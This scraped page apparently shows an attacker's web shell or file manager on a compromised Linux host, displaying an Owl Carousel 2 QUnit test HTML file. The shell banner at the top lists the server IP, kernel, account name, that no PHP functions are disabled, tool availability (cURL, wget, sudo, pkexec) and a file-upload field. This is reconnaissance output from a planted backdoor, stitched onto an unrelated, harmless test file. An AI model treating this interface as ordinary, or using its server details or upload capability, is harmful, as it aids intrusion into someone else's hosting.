| Server IP : 144.76.79.100 / Your IP : 216.73.216.103 [ Web Server : Apache System : Linux ch05.wehostwebserver.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64 User : razzlestore ( 1092) PHP Version : 8.2.29 Disable Function : NONE Domains : 343 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/public_html/cleaning/owl/test/ |
Upload File : |
<!doctype html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Owl Carousel 2</title> <link rel="stylesheet" href="../node_modules/qunitjs/qunit/qunit.css" /> <script src="../node_modules/jquery/dist/jquery.js"></script> <script src="../node_modules/qunitjs/qunit/qunit.js"></script> <script src="../src/js/owl.carousel.js" data-cover></script> <script src="../src/js/owl.support.js" data-cover></script> <script src="../src/js/owl.autoplay.js" data-cover></script> <script src="unit/core.js" defer></script> <script src="unit/autoplay.js" defer></script> </head> <body> <div id="qunit"></div> <div id="qunit-fixture"> <ul id="simple" class="owl-carousel"> <li>1</li> <li>2</li> <li>3</li> </ul> </div> </body> </html>